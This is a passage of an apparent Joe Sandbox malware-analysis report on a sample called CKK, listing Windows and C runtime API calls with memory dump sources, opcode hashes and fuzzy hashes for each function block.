                                                                                              • Instruction Fuzzy Hash: 8631A431904268AFDB10EBACF541B9D77F6EF45370F2101B9E8049B2A2EB325D41DB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetProcAddress.KERNEL32(00000000,009F1129,00000000,00000000,00000000,?,00A2328B,00000006,FlsSetValue,00A92290,FlsSetValue,00000000,00000364,?,00A22E46,00000000), ref: 00A23037
                                                                                              • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00A23044
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressProc__crt_fast_encode_pointer
                                                                                              • String ID:
                                                                                              • API String ID: 2279764990-0
                                                                                              • Opcode ID: 8ae9cd7405a78729e222434bdc748bd81f300b411a068d82ecb1b9e075e72390
                                                                                              • Instruction ID: 129e279da35140d3c8b618d333e1df5e9129acfcd8ae807eaf78ccac6481f64a
                                                                                              • Opcode Fuzzy Hash: 8ae9cd7405a78729e222434bdc748bd81f300b411a068d82ecb1b9e075e72390
                                                                                              • Instruction Fuzzy Hash: 8B11C433A041309BDF31EF5DFC4095A73A5AB817607164230FD15AB265D735ED0296F1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 009F5773
                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000), ref: 00A34052
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 1d6b436df332e0df3bb356629f6f009fdf3f6de46b3619f2d7262265d44b26e4
                                                                                              • Instruction ID: 27ac331adc385886c37a93acc4a8f9612ddf7c83f163442b121507c062ed1979
                                                                                              • Opcode Fuzzy Hash: 1d6b436df332e0df3bb356629f6f009fdf3f6de46b3619f2d7262265d44b26e4
                                                                                              • Instruction Fuzzy Hash: 67019230245225B6E3715A6ADC4EFA77F98EF067B0F118300BBAC5A1E1C7B45855CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A13600: try_get_function.LIBVCRUNTIME ref: 00A13615
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00A13432
                                                                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00A1343D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                              • String ID:
                                                                                              • API String ID: 806969131-0
                                                                                              • Opcode ID: d67098164b77f6a61def6403cc400a99d51d79f285bb9dd7ba6ce2aaadf64d69
                                                                                              • Instruction ID: ac3e964968564336393dd63d63416231f558f639982a800d1d39e0ed14bcd932
                                                                                              • Opcode Fuzzy Hash: d67098164b77f6a61def6403cc400a99d51d79f285bb9dd7ba6ce2aaadf64d69
                                                                                              • Instruction Fuzzy Hash: EFD0127F604301F85D15BFF47E039DA17486951BB63A0575AE431DD2D2EF2087C6251A
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • __Init_thread_footer.LIBCMT ref: 009FBB4E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Init_thread_footer
                                                                                              • String ID:
                                                                                              • API String ID: 1385522511-0
                                                                                              • Opcode ID: 63caa96ddebf7641c400eb341e0352763e8e16b239ef2cf774c797ef1f8c454d
                                                                                              • Instruction ID: 4cf17352cc885d4ee4e6f316c841c2a15dfc2d6d10ba0918c44038433ac3183b
                                                                                              • Opcode Fuzzy Hash: 63caa96ddebf7641c400eb341e0352763e8e16b239ef2cf774c797ef1f8c454d
                                                                                              • Instruction Fuzzy Hash: D032BD39A0020DEFDB10CF54C994FBAB7B9EF84344F158059EA15AB291C7B8ED81DB91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 009F4E90: LoadLibraryA.KERNEL32(kernel32.dll), ref: 009F4E9C
                                                                                                • Part of subcall function 009F4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection,?,?,009F4EDD,?,00AC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009F4EAE
                                                                                                • Part of subcall function 009F4E90: FreeLibrary.KERNEL32(00000000,?,?,009F4EDD,?,00AC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009F4EC0
                                                                                              • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,00AC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009F4EFD
                                                                                                • Part of subcall function 009F4E59: LoadLibraryA.KERNEL32(kernel32.dll), ref: 009F4E62
                                                                                                • Part of subcall function 009F4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection,?,?,00A33CDE,?,00AC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009F4E74
                                                                                                • Part of subcall function 009F4E59: FreeLibrary.KERNEL32(00000000,?,?,00A33CDE,?,00AC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009F4E87
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: Library$Load$AddressFreeProc
                                                                                              • String ID:
                                                                                              • API String ID: 2632591731-0
                                                                                              • Opcode ID: f5811399da387309612dde2e8cf0242892c7e60ad9d472ed2045bce3ebec7309
                                                                                              • Instruction ID: d7912a9ff324ee53c9e6a27a9f27c39a8aee9b28fd11dddddd85e702cd63981b
                                                                                              • Opcode Fuzzy Hash: f5811399da387309612dde2e8cf0242892c7e60ad9d472ed2045bce3ebec7309
                                                                                              • Instruction Fuzzy Hash: B511E332610209ABCF14FB60DD02FBE77A5AF80B10F20882DF646A61C1EE749A459B60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: __wsopen_s
                                                                                              • String ID:
                                                                                              • API String ID: 3347428461-0
                                                                                              • Opcode ID: 70be835c8a5096a391320de798b421104f5411e994f9448e4fb4d3f7452570f1
                                                                                              • Instruction ID: d051d35d50c764ef271fd5c6c43dff5c716891ad1694be1d4b33863a05f12e32
                                                                                              • Opcode Fuzzy Hash: 70be835c8a5096a391320de798b421104f5411e994f9448e4fb4d3f7452570f1
                                                                                              • Instruction Fuzzy Hash: 5E11187590410AEFCB05DF58E941D9A7BF5EF48314F154069F808AB312DA31DA21CBA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000), ref: 009F9A9C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileRead
                                                                                              • String ID:
                                                                                              • API String ID: 2738559852-0
                                                                                              • Opcode ID: ae6740e4a7bdd3425104b32dd52dd06f9161f6c3d9ace24e6b099e9556c57f29
                                                                                              • Instruction ID: c54deccda891e4fa926a7af1d725167c90ddcbddfe7de7246e7dfccd3a47aa33
                                                                                              • Opcode Fuzzy Hash: ae6740e4a7bdd3425104b32dd52dd06f9161f6c3d9ace24e6b099e9556c57f29
                                                                                              • Instruction Fuzzy Hash: 8E1148312047099FD720CF09D880B76B7F9EF44764F10C82EEAAB8AA51C771E945CB60
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 00A24C7D: RtlAllocateHeap.NTDLL(00000008,009F1129,00000000,?,00A22E29,00000001,00000364,?,?,?,00A1F2DE,00A23863,00AC1444,?,00A0FDF5,?), ref: 00A24CBE
                                                                                              • _free.LIBCMT ref: 00A2506C
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap_free
                                                                                              • String ID:
                                                                                              • API String ID: 614378929-0
                                                                                              • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                              • Instruction ID: 0175705f66970ae7ca2ab9ae511b1135b9e756840d157547f88ff948000adc22
                                                                                              • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
                                                                                              • Instruction Fuzzy Hash: D60104726046146FE3218F69AC81A5AFBE8FB89370F65053DE18483280EA30A90586A4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: __alldvrm
                                                                                              • String ID:
                                                                                              • API String ID: 65215352-0
                                                                                              • Opcode ID: a845a44d02681bb2d7e28a9375752329a8500175178d90c20446a2b2f7487fa6
                                                                                              • Instruction ID: 0f359670f91b2f413f661bafe77d69b4a6fb3c23d79593f4f67c719cb6081757
                                                                                              • Opcode Fuzzy Hash: a845a44d02681bb2d7e28a9375752329a8500175178d90c20446a2b2f7487fa6
                                                                                              • Instruction Fuzzy Hash: 3C01D471910358BFEB24DFA4DD46BEEB7ECEB01324F10856EE816D7100D6369E8087A4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                              • Instruction ID: d548ecfda8f10b4a063968d203077ced237749dcf8adad0d93a7f6d0e839484e
                                                                                              • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
                                                                                              • Instruction Fuzzy Hash: 43F02832511A20AAD7317B7DEE05BDA339C9F52330F100B25FC31931D2CB74E88186A5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000008,009F1129,00000000,?,00A22E29,00000001,00000364,?,?,?,00A1F2DE,00A23863,00AC1444,?,00A0FDF5,?), ref: 00A24CBE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 37e196b5329c2d78361b54040b2aa10a02186b9d9eab5d692f06f00225a0ba3f
                                                                                              • Instruction ID: a0016ce88bfe6b8b70527a7ec8715fe88114be15ca7e456abac75999429c29c2
                                                                                              • Opcode Fuzzy Hash: 37e196b5329c2d78361b54040b2aa10a02186b9d9eab5d692f06f00225a0ba3f
                                                                                              • Instruction Fuzzy Hash: 79F0E93160773467DB215F6EFD09F9A3799BF497B0B194131B815AA281CA70D80186E0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00AC1444,?,00A0FDF5,?,?,009FA976,00000010,00AC1440,009F13FC,?,009F13C6,?,009F1129), ref: 00A23852
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: 0c3a88dd2aa7e1a8fbce3915dc2e78e9cde50f38b9ba66ff6c4e5502390ce00d
                                                                                              • Instruction ID: 018ef6e4d82f348b822cc20690f5836e55a7dfb93d85076fccf72c2db69011ca
                                                                                              • Opcode Fuzzy Hash: 0c3a88dd2aa7e1a8fbce3915dc2e78e9cde50f38b9ba66ff6c4e5502390ce00d
                                                                                              • Instruction Fuzzy Hash: 6DE0E53320223466DE212BBFBD04BDA3659AB43BB0F1A0130BD059E581CB29DD0286E0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(?,?,00AC1418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 009F4F6D
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID:
                                                                                              • API String ID: 3664257935-0
                                                                                              • Opcode ID: b89bd253f3046b6564722100111c32e43ef8573e53aa31a0dd912bf51072c77b
                                                                                              • Instruction ID: e964f58043fb73ab0f410aa94a3d46549a8ac9fb3f59364e7fd282c8300ca57e
                                                                                              • Opcode Fuzzy Hash: b89bd253f3046b6564722100111c32e43ef8573e53aa31a0dd912bf51072c77b
                                                                                              • Instruction Fuzzy Hash: 1CF03971505756CFDB349F64D494823BBE8AF143293208E7EE2EE82621CB359888DF50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetLongPathNameW.KERNELBASE ref: 009F2DC4
                                                                                                • Part of subcall function 009F6B57: _wcslen.LIBCMT ref: 009F6B6A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: LongNamePath_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 541455249-0
                                                                                              • Opcode ID: 6eaf039cf3b82464da9bf07b28b3c7ccdab428ff65ece39108fb5959cc4dd358
                                                                                              • Instruction ID: de091085eef5afde707b8b7dc2200971f30bf8fd6c1a7a52f7db5a9f3389103a
                                                                                              • Opcode Fuzzy Hash: 6eaf039cf3b82464da9bf07b28b3c7ccdab428ff65ece39108fb5959cc4dd358
                                                                                              • Instruction Fuzzy Hash: 5FE0CD72A042245BC710E2989C05FEA77DDDFC8790F040071FD09D7248E970AD808650
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: __fread_nolock
                                                                                              • String ID:
                                                                                              • API String ID: 2638373210-0
                                                                                              • Opcode ID: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                                                              • Instruction ID: 88e4567c8134d8116e285fdb36b75b84ca9897ee427807a764f2c3786d8c2ff8
                                                                                              • Opcode Fuzzy Hash: 62c4ae1466583100269b95fce18df2779376e23d7999e61a0ae1b5108404e028
                                                                                              • Instruction Fuzzy Hash: 5BE04FB5609B005FDF399B28E9517F677E8DF49300F00086EF69B83252E57268458B4D
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                                • Part of subcall function 009F3837: Shell_NotifyIconW.SHELL32(00000000,?), ref: 009F3908
                                                                                                • Part of subcall function 009FD730: GetInputState.USER32 ref: 009FD807
                                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 009F2B6B
                                                                                                • Part of subcall function 009F30F2: Shell_NotifyIconW.SHELL32(00000002,?), ref: 009F314E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798551511.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                                                                                              • Associated: 00000003.00000002.798547358.00000000009F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000A8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798623556.0000000000AB2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798639828.0000000000ABC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000003.00000002.798643485.0000000000AC4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_9f0000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: IconNotifyShell_$CurrentDirectoryInputState
                                                                                              • String ID:
                                                                                              • API String ID: 3667716007-0
                                                                                              • Opcode ID: 28b244dd67ff127704f8df0ebbbc972a630853756fa46f29909129c266e4e41d
                                                                                              • Instruction ID: cda148638167cfbc847c31be85aeeb27d335aafc3cccd36b2fd7ef4a6eedc754
                                                                                              • Opcode Fuzzy Hash: 28b244dd67ff127704f8df0ebbbc972a630853756fa46f29909129c266e4e41d
                                                                                              • Instruction Fuzzy Hash: DBE0CD7130424C07C608FB759852B7DF759DBD2356F40553EF746871A3CF2885464351
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?), ref: 001908EB
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.798481679.0000000000190000.00000040.00001000.00020000.00000000.sdmp, Offset: 00190000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_190000_CKK.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile
                                                                                              • String ID:
                                                                                              • API String ID: 3188754299-0
                                                                                              • Opcode ID: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
                                                                                              • Instruction ID: b56048b1f4f79ce6928199f546885e1a99655e60a01f4491d38ff82d841d5c7c
                                                                                              • Opcode Fuzzy Hash: 195c23eedc4a89e51baf60bc3cc3d10d01908f8b29aed20e491e172ce03d4d2a
